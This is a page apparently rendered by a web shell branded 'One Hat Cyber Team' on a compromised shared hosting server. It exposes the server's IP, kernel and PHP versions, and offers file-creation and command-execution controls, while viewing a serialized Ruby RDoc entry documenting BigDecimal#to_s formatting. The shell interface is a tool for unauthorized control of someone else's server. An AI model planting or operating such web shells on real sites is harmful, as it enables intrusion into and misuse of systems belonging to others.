⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby19
/
share
/
ri
/
1.9.1
/
system
/
BigDecimal
/
View File Name :
to_s-i.ri
U:RDoc::AnyMethod[iI" to_s:ETI"BigDecimal#to_s;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"$Converts the value to a string.;To:RDoc::Markup::BlankLine o; ; [I".The default format looks like 0.xxxxEnn.;T@o; ; [I"OThe optional parameter s consists of either an integer; or an optional '+';TI"Por ' ', followed by an optional number, followed by an optional 'E' or 'F'.;T@o; ; [I"KIf there is a '+' at the start of s, positive values are returned with;TI"a leading '+'.;T@o; ; [I"LA space at the start of s returns positive values with a leading space.;T@o; ; [I"NIf s contains a number, a space is inserted after each group of that many;TI"fractional digits.;T@o; ; [I"EIf s ends with an 'E', engineering notation (0.xxxxEnn) is used.;T@o; ; [I"IIf s ends with an 'F', conventional floating point notation is used.;T@o; ; [I"Examples:;T@o; ; [I"VBigDecimal.new('-123.45678901234567890').to_s('5F') -> '-123.45678 90123 45678 9';T@o; ; [I"TBigDecimal.new('123.45678901234567890').to_s('+8F') -> '+123.45678901 23456789';T@o; ; [I"RBigDecimal.new('123.45678901234567890').to_s(' F') -> ' 123.4567890123456789';T: @file0I"to_s(s) ;T0[ I"(p1 = v1);FI" ext/bigdecimal/bigdecimal.c;T